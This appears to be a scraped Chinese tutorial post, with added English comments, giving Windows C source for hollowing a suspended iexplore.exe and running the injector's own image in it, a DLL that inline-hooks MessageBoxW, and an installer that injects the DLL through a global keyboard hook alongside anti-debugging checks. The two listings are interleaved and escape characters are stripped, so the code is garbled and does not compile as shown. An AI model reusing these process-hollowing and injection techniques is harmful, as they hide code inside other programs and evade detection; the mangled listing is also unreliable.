把自身插入到IE进程里的代码

作者: 计算机网络  发布:2019-11-14

#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")

说明

// NTSTATUS is not exposed by <windows.h>; a plain long stands in for it so the
// ZwUnmapViewOfSection prototype below can be declared without <winternl.h>
// (the function itself is pulled in through the ntdll.lib pragma above).
typedef long NTSTATUS;

该程序通过消息hook注入dll到目标程序,之后通过inline hook修改MessageBoxW函数入口的头5个字节来达成MessageBox的HOOK

// Prototype for the ntdll export used to drop the target's original image.
// Zw* calls are undocumented for user mode; the two-argument form declared
// here (process handle, base address) is what InjectProcess() calls.
// Defender note: unmapping another process's image base right after a
// CREATE_SUSPENDED CreateProcess() is the tell-tale step of process hollowing.
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
      HANDLE ProcessHandle,
      PVOID BaseAddress
      );

代码1是dll内容,代码2是hook程序

// Per-child bookkeeping filled in by CreateInjectProcess().
// 32-bit only: addresses are carried as DWORD and come from the x86 CONTEXT.
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress; // image base of the suspended child, read from its PEB (PEB+8)
DWORD dwReserve;     // not referenced anywhere in this listing
} CHILDPROCESS;


// Full path of the target executable; filled by FindIePath() and handed to
// CreateProcess() as the (writable) command line in CreateInjectProcess().
char szIePath[MAX_PATH];

源码

// Forward declarations for the injector executable.
BOOL FindIePath(char *IePath,int *dwBuffSize); // builds the iexplore.exe path; dwBuffSize is ignored
BOOL InjectProcess(void);                     // the hollowing driver (see its header comment)
DWORD GetSelfImageSize(HMODULE hModule);      // SizeOfImage of this process, read from the PEB loader list

#include

// Starts the target suspended and reports its thread context and image base.
BOOL CreateInjectProcess(
       PPROCESS_INFORMATION pi,          // out: handles of the suspended child
       PCONTEXT pThreadCxt,              // out: CONTEXT_FULL of its primary thread
       CHILDPROCESS *pChildProcess       // out: dwBaseAddress read from the child's PEB
       );

#include

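/*
 * Entry point of the injector executable.
 *
 * InjectProcess() returns TRUE once it has started a suspended iexplore.exe
 * and copied this image into it; it returns FALSE when GetModuleFileName()
 * already reports the IE path or when the module handle cannot be obtained.
 * The path comparison suggests the FALSE branch is the copy running inside
 * the hollowed child (where the process reports itself as iexplore.exe), so
 * the MessageBox() is effectively the in-target payload and the printf() is
 * the parent's report -- inferred from InjectProcess(), not stated on the page.
 *
 * The "rn" at the end of the format string looks like a "\r\n" escape whose
 * backslashes were lost during extraction; it is reproduced as published.
 * Change from the original: the unused local `HWND hwnd` was removed.
 */
int main(void)
{
    if (!InjectProcess())
    {
        MessageBox(NULL,"进程插入实现","Text",MB_OK);
        return 0;
    }

    printf("This is my a test code,made by shadow3.rn");
    return 0;
}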

// Global from the DLL listing (interleaved here by the scraper): the host's own
// process id. The DLL_PROCESS_ATTACH fragment further down sets it from
// GetCurrentProcessId() and uses it to OpenProcess() the DLL's own host.
DWORD dwPid = 0;

/*
 * Build the path of the Internet Explorer binary into IePath.
 *
 * Only the drive letter of the system directory is kept (the string is cut
 * at index 2) and the fixed suffix below is appended. dwBuffSize is ignored;
 * IePath is assumed to hold at least MAX_PATH bytes (the only caller passes
 * the global szIePath). Always returns TRUE; a GetSystemDirectory() failure
 * is not detected.
 *
 * Extraction damage: the empty character constant '' was almost certainly
 * '\0' in the original, and the path literal has lost its backslash
 * escapes, so this block does not compile as published. The three
 * `void HookOff();` / `void HookOn();` / `VOID InlineHook();` lines are
 * prototypes from the DLL listing that the scraper merged into this
 * function; they are legal block-scope declarations but do not belong here.
 */
BOOL FindIePath(char *IePath,int *dwBuffSize)
{
char szSystemDir[MAX_PATH];

void HookOff();   // [DLL listing] displaced prototype

GetSystemDirectory(szSystemDir,MAX_PATH);   // return value unchecked

void HookOn();    // [DLL listing] displaced prototype

szSystemDir[2] = '';   // terminate after the drive letter and colon (original: '\0')
   lstrcat(szSystemDir,"\ProgramFiles\Internet Explorer\iexplore.exe");   // backslashes lost in extraction

VOID InlineHook();   // [DLL listing] displaced prototype

lstrcpy(IePath, szSystemDir);   // unbounded copy; relies on IePath being MAX_PATH
return TRUE;
}

// [DLL listing] Signature of MessageBoxW, used to keep a typed pointer to the
// original entry resolved in InlineHook().
typedef int (WINAPI* MBW)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType);

/*
 * Hollow a freshly started iexplore.exe and run this executable's image in it.
 *
 * Sequence as published:
 *   1. Refuse to run if this image already reports the IE path (so the copy
 *      running inside the hollowed child does not recurse).
 *   2. Start IE suspended and read its image base (CreateInjectProcess()).
 *   3. ZwUnmapViewOfSection() the child's own image.
 *   4. VirtualAllocEx() RWX memory in the child at *this* module's base and
 *      copy this module's mapped image there byte-for-byte (GetSelfImageSize()).
 *   5. Overwrite PEB.ImageBaseAddress (PEB+8, via the child's Ebx), point Eax
 *      at the entry point, then SetThreadContext() / ResumeThread().
 * Returns TRUE on completion, FALSE when running as IE or when the module
 * handle cannot be obtained.
 *
 * Defender notes: steps 2-5 are the canonical process-hollowing chain
 * (CREATE_SUSPENDED -> unmap -> WriteProcessMemory -> SetThreadContext ->
 * ResumeThread) that endpoint products key on. The copied image is not
 * relocated, so it appears to work only when the allocation lands at the
 * injector's own preferred base.
 *
 * Issues visible in the listing (left as published):
 *   - if ZwUnmapViewOfSection() fails the function returns TRUE and leaves
 *     the suspended child alive; pi.hProcess / pi.hThread are never closed
 *     on any path.
 *   - the `== stChildProcess.dwBaseAddress` test compares the new block with
 *     IE's old base although the allocation was requested at hModule; both
 *     branches yield the same entry address only when those bases coincide.
 *   - the "rn" tails of the format strings are stripped "\r\n" escapes.
 *   - several lines of the DLL's DllMain (the `BOOL APIENTRY DllMain(...){`
 *     header, `switch (fdwReason){`, `case DLL_PROCESS_ATTACH:`, the stray `{`
 *     before the #ifdef block and `DWORD dwPid = GetCurrentProcessId();`) and
 *     the hook globals (OldMsgBoxW, pfOldMsgBoxW, OldCode, NewCode, hProcess,
 *     hInst) were interleaved into this function by the scraper; the block
 *     does not compile as published.
 */
BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];   // this executable's path, for the self-check below
DWORD dwImageSize = 0;         // SizeOfImage of this module (bytes to copy)

MBW OldMsgBoxW = NULL;// [DLL listing] typed pointer to the original MessageBoxW

STARTUPINFO si = {0};          // unused here (CreateInjectProcess has its own)
PROCESS_INFORMATION pi;        // handles of the suspended child
CONTEXT ThreadCxt;             // child's primary-thread context
DWORD *PPEB;                   // child's PEB indexed as DWORD[]: [2] is ImageBaseAddress
DWORD dwWrite = 0;             // bytes written by WriteProcessMemory (never checked)
CHILDPROCESS stChildProcess;   // child's original image base
LPVOID lpVirtual = NULL;       // block allocated in the child for our image
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;   // our own NT headers (ImageBase / AddressOfEntryPoint)

FARPROC pfOldMsgBoxW;// [DLL listing] untyped pointer to the same entry (patch target)

HMODULE hModule = NULL;        // base of this executable

BYTE OldCode[5];// [DLL listing] original first five bytes of the API entry

ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH);

BYTE NewCode[5];// [DLL listing] replacement entry bytes (jmp rel32)

GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL);

HANDLE hProcess = NULL;// [DLL listing] handle to the DLL's own host process

// Self-check: if this image already reports the IE path it is presumably the
// copy running inside the hollowed child -- do not inject again.
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
   return FALSE;
}

HINSTANCE hInst = NULL;// [DLL listing] handle of the DLL that exports the API (unused)

hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
   return FALSE;
}

// [DLL listing] DllMain header interleaved here by the scraper; what follows
// mixes its DLL_PROCESS_ATTACH case with the rest of InjectProcess().
BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpvReserved){

// Parse our own headers in memory so the entry-point RVA is available later.
pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);

switch (fdwReason){   // [DLL listing]

dwImageSize = GetSelfImageSize(hModule);   // size of our mapped image to copy

case DLL_PROCESS_ATTACH:// [DLL listing] process attaches the DLL

// Steps 2-5 of the hollowing chain (see header).
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) )
{
   printf("CHILD PID: [%d]rn",pi.dwProcessId);
 
 
   // Drop the child's original image so its base range can be reused.
   if ( ZwUnmapViewOfSection(
    pi.hProcess,
    (LPVOID)stChildProcess.dwBaseAddress
    ) == 0 )
   {
    // Request RWX memory in the child at *our* base, not the child's old
    // base; the copy below is not relocated, so it only runs if this lands.
    lpVirtual = VirtualAllocEx(
     pi.hProcess,
     (LPVOID)hModule,
     dwImageSize,
     MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE
     );
  
    if ( lpVirtual )
    {
     printf("Unmapped and Allocated Mem Success.rn");
    }
  
   }
   else
   {
    printf("ZwUnmapViewOfSection() failed.rn");
    return TRUE;   // NOTE: reports success and leaves the suspended child alive
   }
 
   if ( lpVirtual )
   {
    PPEB = (DWORD *)ThreadCxt.Ebx;   // Ebx of a fresh x86 primary thread holds the PEB (by convention)
  
    // overwrite the load address: PEB->ImageBaseAddress (PEB+8) = lpVirtual
  
    WriteProcessMemory(
     pi.hProcess,
     &PPEB[2],
     &lpVirtual,
     sizeof(DWORD),
     &dwWrite
     );
  
  
    // Copy our in-memory image (headers + sections, as mapped) into the child.
    if ( WriteProcessMemory(
     pi.hProcess,
     lpVirtual,
     hModule,
     dwImageSize,
     &dwWrite) )
    {
     printf("image inject into process success.rn");
   
     // Redirect the primary thread: Eax of a fresh x86 thread is the address
     // the loader will transfer to, so point it at our entry point.
     ThreadCxt.ContextFlags = CONTEXT_FULL;
     if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
     {
      ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
     }
     else
     {
      ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
     }

{   // stray `{` from the interleaving: the `}` after ResumeThread() closes the if-body above, leaving the `else` unbalanced

#ifdef DEBUG
     printf("EAX = [0x%08x]rn",ThreadCxt.Eax);
     printf("EBX = [0x%08x]rn",ThreadCxt.Ebx);
     printf("ECX = [0x%08x]rn",ThreadCxt.Ecx);
     printf("EDX = [0x%08x]rn",ThreadCxt.Edx);
     printf("EIP = [0x%08x]rn",ThreadCxt.Eip);
#endif
   
     SetThreadContext(pi.hThread, &ThreadCxt);   // unchecked
     ResumeThread(pi.hThread);                   // child now executes our image
   
    }
    else
    {
     printf("WirteMemory Failed,code:%drn",GetLastError());
     TerminateProcess(pi.hProcess, 0);
    }
  
   }
   else
   {
    printf("VirtualMemory Failed,code:%drn",GetLastError());
    TerminateProcess(pi.hProcess, 0);
   }
}

DWORD dwPid = GetCurrentProcessId();   // [DLL listing] DLL_PROCESS_ATTACH: remember own pid

return TRUE;   // pi.hProcess / pi.hThread are never closed
}

// [DLL listing] Fragment of DLL_PROCESS_ATTACH: open a full-access handle to
// the DLL's own host (dwPid = GetCurrentProcessId()); HookOn()/HookOff() patch
// through this handle. Displaced here by the scraper; not valid at file scope.
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);

/*
 * Return this process's SizeOfImage by walking the loader data in the PEB.
 *
 * 32-bit MSVC inline asm over undocumented x86 structure layouts:
 *   fs:[0x30]   -> PEB
 *   PEB+0x0c    -> PEB_LDR_DATA
 *   Ldr+0x0c    -> InLoadOrderModuleList.Flink, the main executable's
 *                  LDR_DATA_TABLE_ENTRY
 *   entry+0x20  -> SizeOfImage (fetched with lodsd)
 * The hModule parameter is not used: the walk always yields the first module
 * in load order, i.e. the process's own image.
 *
 * Defender note: reading fs:[0x30] and the loader list by hand instead of
 * calling a documented API is a common way to avoid imports that static
 * analysis would flag.
 *
 * The `InlineHook();` and MessageBox() lines inside the body, and the
 * unmatched `}` after the function, belong to the DLL's DLL_PROCESS_ATTACH
 * handler and were interleaved here by the scraper.
 */
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;

InlineHook();   // [DLL listing] installs the MessageBoxW inline hook

_asm
{
   mov ecx,0x30
    mov eax, fs:[ecx]          // eax = PEB
    mov eax, [eax + 0x0c]      // eax = PEB->Ldr
    mov esi, [eax + 0x0c]      // esi = first LDR_DATA_TABLE_ENTRY (InLoadOrderModuleList.Flink)
    add esi,0x20               // esi = &entry->SizeOfImage
    lodsd                      // eax = SizeOfImage
    mov dwImageSize,eax
  
}

MessageBox(NULL, "DLL_PROCESS_ATTACH", "DLL HOOK", MB_OK);   // [DLL listing]

return dwImageSize;
}

}   // [DLL listing] stray closing brace from the interleaved DllMain

/*
 * Start the target suspended and capture what the hollowing step needs.
 *
 * CreateProcess(NULL, szIePath, ..., CREATE_SUSPENDED, ...) starts IE with its
 * primary thread parked before any image code runs. The CONTEXT_FULL context
 * of that thread is read into *pThreadCxt; on 32-bit Windows the initial Ebx
 * by convention holds the PEB address, so PEB+8 (ImageBaseAddress) is read
 * through PPEB[2] into pChildProcess->dwBaseAddress.
 * Returns TRUE after the read, FALSE if CreateProcess() fails.
 *
 * Notes (left as published):
 *   - `STARTUPINFO si = {0}` never sets si.cb = sizeof(si), which the API
 *     requires.
 *   - GetThreadContext() and ReadProcessMemory() results are not checked, so
 *     dwBaseAddress may be garbage on failure.
 *   - szIePath is passed as lpCommandLine, which must be writable; it is,
 *     being a global char array.
 *   - the two `break;` lines and `case DLL_THREAD_ATTACH:` are fragments of
 *     the DLL's DllMain switch merged in by the scraper; the block does not
 *     compile as published.
 */
BOOL CreateInjectProcess(
       PPROCESS_INFORMATION pi,
       PCONTEXT pThreadCxt,
       CHILDPROCESS *pChildProcess
       )
     
{
STARTUPINFO si = {0};   // si.cb is left at 0

break;   // [DLL listing] end of the DLL_PROCESS_ATTACH case

DWORD *PPEB;   // child's PEB as DWORD[]: PPEB[2] == PEB+8 == ImageBaseAddress
DWORD read;    // bytes read by ReadProcessMemory (unchecked)

case DLL_THREAD_ATTACH:// [DLL listing] a thread attaches to the DLL

// start IE in suspended mode

//MessageBox(NULL, "DLL_THREAD_ATTACH", "DLL HOOK", MB_OK);

if( CreateProcess(
   NULL,
   szIePath,
   NULL,
   NULL,
   0,
   CREATE_SUSPENDED,
   NULL,
   NULL,
   &si,
   pi
   ) )
{
   pThreadCxt->ContextFlags = CONTEXT_FULL;
   GetThreadContext(pi->hThread, pThreadCxt);   // unchecked
 
   PPEB = (DWORD *)pThreadCxt->Ebx;   // Ebx of the fresh x86 thread = PEB (by convention)
 
   // read IE's image base address (PEB->ImageBaseAddress)
   ReadProcessMemory(
    pi->hProcess,
    &PPEB[2],
    (LPVOID)&(pChildProcess->dwBaseAddress),
    sizeof(DWORD),
    &read
    );
 
   return TRUE ;
 
}

break;   // [DLL listing] end of the DLL_THREAD_ATTACH case

return FALSE;
}

case DLL_THREAD_DETACH:// [DLL listing] a thread detaches from the DLL (continues below the stray summary line)


// Tail of the DLL's DllMain. Its header and DLL_PROCESS_ATTACH case are
// interleaved into InjectProcess() above; only the remaining switch cases and
// the return survive here in one piece.
//MessageBox(NULL, "DLL_THREAD_DETACH", "DLL HOOK", MB_OK);

break;

case DLL_PROCESS_DETACH:// process detaches the DLL: undo the patch before the hook code goes away

HookOff();   // restore the five original bytes of MessageBoxW

MessageBox(NULL, "DLL_PROCESS_DETACH", "DLL HOOK", MB_OK);

break;

}   // end of switch (fdwReason)

return TRUE;   // DllMain reports success for every reason code

}   // end of DllMain

/*
 * Replacement for MessageBoxW installed by InlineHook().
 *
 * The patch is lifted for the duration of the real call -- with the jmp in
 * place MessageBoxW's entry would land straight back here -- and re-applied
 * afterwards. The caller's lpText is discarded and a fixed string is shown;
 * caption and flags are passed through, and MessageBoxW's result is returned.
 */
int WINAPI MyMessageBoxW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType){
    int shown;

    (void)lpText;  /* deliberately replaced by the fixed text below */

    HookOff();     /* put the original five bytes back so the real entry is callable */
    shown = MessageBoxW(hWnd, L"哈哈,MessageBoxW被HOOK了", lpCaption, uType);
    HookOn();      /* re-install the jmp for the next caller */

    return shown;
}

/*
 * Prepare and enable a 5-byte inline hook on user32!MessageBoxW.
 * (Original note: "export? probably not needed; starts the inline hook".)
 *
 * 1. Resolve MessageBoxW via LoadLibrary/GetProcAddress and keep both a typed
 *    (OldMsgBoxW) and an untyped (pfOldMsgBoxW) pointer to it.
 * 2. Save the first five bytes of the entry into OldCode (movsd + movsb) so
 *    HookOff() can restore them.
 * 3. Build NewCode = E9 <rel32>, a relative jmp whose displacement is
 *    MyMessageBoxW - MessageBoxW - 5: rel32 is measured from the end of the
 *    5-byte jmp itself, which is what the "- 5" accounts for.
 * 4. HookOn() writes NewCode over the entry.
 *
 * If the export cannot be resolved a message box is shown and nothing is
 * patched. The hmod from LoadLibrary() is never released. 32-bit MSVC inline
 * asm; x86-only (a rel32 jmp cannot reach arbitrary x64 addresses).
 * Defender note: an E9 patch at the entry of a user32/kernel32 export is
 * exactly what user-mode hook scanners detect by comparing against the
 * on-disk bytes of the module.
 */
VOID InlineHook(){

// resolve the original API entry address

HMODULE hmod = LoadLibrary(TEXT("User32.dll"));

OldMsgBoxW = (MBW)GetProcAddress(hmod, "MessageBoxW");

pfOldMsgBoxW = (FARPROC)OldMsgBoxW;

// error check

if (NULL == pfOldMsgBoxW){

MessageBox(NULL, TEXT("获取原API入口地址出错"), TEXT("error!"), 0);

return;

}

// asm: fetch the first 5 bytes of the entry and copy them into OldCode

__asm{

lea edi, OldCode// edi = address of the OldCode array (destination)

mov esi, pfOldMsgBoxW// esi = original API entry address (source)

cld// clear the direction flag so the string moves below walk from low to high addresses

movsd// copy the first 4 bytes of the API entry into OldCode

movsb// copy the 5th byte into OldCode

}

// build the code that will jump to our function

NewCode[0] = 0xe9;// jmp rel32 opcode

__asm{

lea eax, MyMessageBoxW// eax = address of our MyMessageBoxW (author's example value: 1000)

mov ebx, pfOldMsgBoxW// ebx = address of the system API (author's example value: 2002)

sub eax, ebx// eax = MyMessageBoxW - MessageBoxW: displacement from the patch site

sub eax, 5// minus the jmp length: rel32 is relative to the instruction that follows the jmp

mov dword ptr[NewCode + 1], eax// store rel32 into NewCode[1..4]

// note: opcode + rel32 = 5 bytes in total

}

HookOn();

}

/*
 * Enable the MessageBoxW hook: overwrite the first five bytes of the original
 * entry with the "jmp MyMessageBoxW" prepared in NewCode by InlineHook().
 *
 * Does nothing until hProcess has been opened (the DLL opens a handle to its
 * own host in DLL_PROCESS_ATTACH). Page protection is flipped to
 * PAGE_READWRITE for the write and restored afterwards; as in the original,
 * none of the three calls is checked.
 */
void HookOn(){
    const SIZE_T patchLen = 5;
    DWORD prevProtect = 0;
    DWORD scratch = 0;

    if (hProcess == NULL) {
        return;
    }

    /* make the entry writable, patch in the jmp, put the old protection back */
    VirtualProtectEx(hProcess, pfOldMsgBoxW, patchLen, PAGE_READWRITE, &prevProtect);
    WriteProcessMemory(hProcess, pfOldMsgBoxW, NewCode, patchLen, NULL);
    VirtualProtectEx(hProcess, pfOldMsgBoxW, patchLen, prevProtect, &scratch);
}

/*
 * Disable the MessageBoxW hook: write the five original entry bytes saved in
 * OldCode back over the jmp, so the real function can be called.
 *
 * Does nothing until hProcess has been opened. Protection is lowered to
 * PAGE_READWRITE for the write and restored afterwards; as in the original,
 * none of the three calls is checked.
 */
void HookOff(){
    const SIZE_T patchLen = 5;
    DWORD prevProtect = 0;
    DWORD scratch = 0;

    if (hProcess == NULL) {
        return;
    }

    /* make the entry writable, restore the saved bytes, put the old protection back */
    VirtualProtectEx(hProcess, pfOldMsgBoxW, patchLen, PAGE_READWRITE, &prevProtect);
    WriteProcessMemory(hProcess, pfOldMsgBoxW, OldCode, patchLen, NULL);
    VirtualProtectEx(hProcess, pfOldMsgBoxW, patchLen, prevProtect, &scratch);
}

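/*
 * Keyboard hook procedure exported by the DLL. It does nothing itself: it
 * exists only so SetWindowsHookEx(WH_KEYBOARD, ...) has a procedure to
 * install, which is what makes Windows load this DLL into other processes
 * (the original comment: "only uses the hook to inject the DLL").
 * Every event is passed on to the next hook in the chain.
 *
 * Fix: the original passed `myproc` itself as the HHOOK argument -- a
 * function pointer where a handle is expected, an incompatible-pointer
 * conversion. CallNextHookEx documents that parameter as ignored on current
 * Windows, so NULL is the type-correct value.
 */
LRESULT WINAPI myproc(int code, WPARAM w, LPARAM l){
    return CallNextHookEx(NULL, code, w, l);
}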

源码

#include

#include

// Signature used to call IsDebuggerPresent through a pointer resolved at run
// time with GetProcAddress() instead of through the import table. `_stdcall`
// is the single-underscore spelling MSVC accepts as an alias of __stdcall.
typedef BOOL(_stdcall *LPAPI_IDP)(VOID);

/*
 * Entry point of the hook-installer program ("code 2").
 *
 * Sections as published:
 *   1. Three anti-debug probes, all report-only (every ExitProcess(0) is
 *      commented out): Kernel32 must be loadable, IsDebuggerPresent must
 *      resolve, its first byte must be neither 0xCC (an int3 breakpoint) nor
 *      anything other than 0x64 (presumably the fs: segment prefix of the
 *      32-bit implementation -- not stated on the page), and the call itself
 *      must return FALSE.
 *   2. An inline-asm walk TEB -> PEB -> Ldr -> first loader entry -> +0x30,
 *      printed with wprintf(). In the x86 LDR_DATA_TABLE_ENTRY layout +0x30
 *      appears to be BaseDllName.Buffer, a UTF-16 string, which is why %s
 *      under wprintf prints it although `name` is declared LPSTR -- the
 *      declared type is simply wrong. TODO confirm the offset.
 *   3. Load mydll.dll, resolve "myproc" and install it as a WH_KEYBOARD hook
 *      for all threads (last argument 0). That is the injection step: Windows
 *      maps mydll.dll into every process that receives keyboard input. The
 *      message loop keeps the hook alive; UnhookWindowsHookEx() runs only
 *      after WM_QUIT.
 *
 * Defender note: SetWindowsHookEx-driven DLL loading is an old but still
 * common injection path; a new global WH_KEYBOARD hook whose module is an
 * unsigned DLL sitting next to the installer is a strong signal.
 *
 * Issues left as published:
 *   - `mydll` is not checked for NULL before GetProcAddress(); `myproc` is
 *     declared HMODULE but receives a FARPROC and is then passed where a
 *     HOOKPROC is expected (implicit incompatible-pointer conversions).
 *   - kbhook may be NULL when UnhookWindowsHookEx() is reached.
 *   - the "n" at the end of the format strings are stripped "\n" escapes.
 */
int main(int argc, PCHAR argv[]){

HMODULE hModule = LoadLibrary("Kernel32");// load the Kernel32 module

if (hModule == NULL)

{

printf("被调和,不或然拿到 kernel32.dll模块n");//ExitProcess(0); // exit immediately if debugging is detected (disabled)

}

LPAPI_IDP IsDebuggerPresent = GetProcAddress(hModule, "IsDebuggerPresent");// resolve the address at run time

if (IsDebuggerPresent == NULL)

{

printf("被调理,不可能得到 IsDebuggerPresent 地址n");//ExitProcess(0); // exit immediately if debugging is detected (disabled)

}

if (*(BYTE *)IsDebuggerPresent == 0xcc ||// before calling, check whether a breakpoint was planted on the entry

*(BYTE *)IsDebuggerPresent != 0x64 ||   // first byte is expected to be 0x64 (presumably the fs: prefix) -- TODO confirm

IsDebuggerPresent())// call it

{

printf("被调试,下断点n");//ExitProcess(0); // exit immediately if debugging is detected (disabled)

}

LPSTR name;   // actually receives a UTF-16 buffer pointer (see header)

__asm{

mov eax, fs:[0x18]//_NT_TIB: TEB self pointer

mov eax, [eax + 0x30]// TEB+0x30 = PEB

mov eax, [eax + 0xc]//_PEB_LDR_DATA: PEB+0x0c = Ldr

mov eax, [eax + 0xc]//_LIST_ENTRY: Ldr+0x0c = InLoadOrderModuleList.Flink (first module = this exe)

mov eax, [eax + 0x30]// entry+0x30: appears to be BaseDllName.Buffer (x86 layout) -- TODO confirm

mov name, eax

}

wprintf(L"%sn", name);   // %s under wprintf reads a wide string on MSVC

BOOL ret = IsDebuggerPresent();

printf("IsDebuggerPresent = %dn", ret);

HHOOK kbhook;

HMODULE mydll = LoadLibrary("mydll.dll");   // the hook DLL; NULL is not checked

HMODULE myproc = GetProcAddress(mydll, "myproc");   // returns FARPROC; HMODULE is the wrong type

kbhook = SetWindowsHookEx(WH_KEYBOARD, myproc, mydll, 0);   // dwThreadId 0: all threads -> the DLL is loaded into every process receiving keyboard input

if (kbhook == NULL){

printf("SetWindowsHookEx failed %dn", GetLastError());

} else

{

printf("执行SetWindowsHookEx完成.n");

printf("额,不执行?n");

}

//BOOL crdp = CheckRemoteDebuggerPresent();

// message loop: keeps the hook installed until WM_QUIT

MSG msg;

while (GetMessage(&msg, NULL, 0, 0)){

TranslateMessage(&msg);

DispatchMessage(&msg);

};

UnhookWindowsHookEx(kbhook);   // kbhook may be NULL here

getchar();

return 0;

}

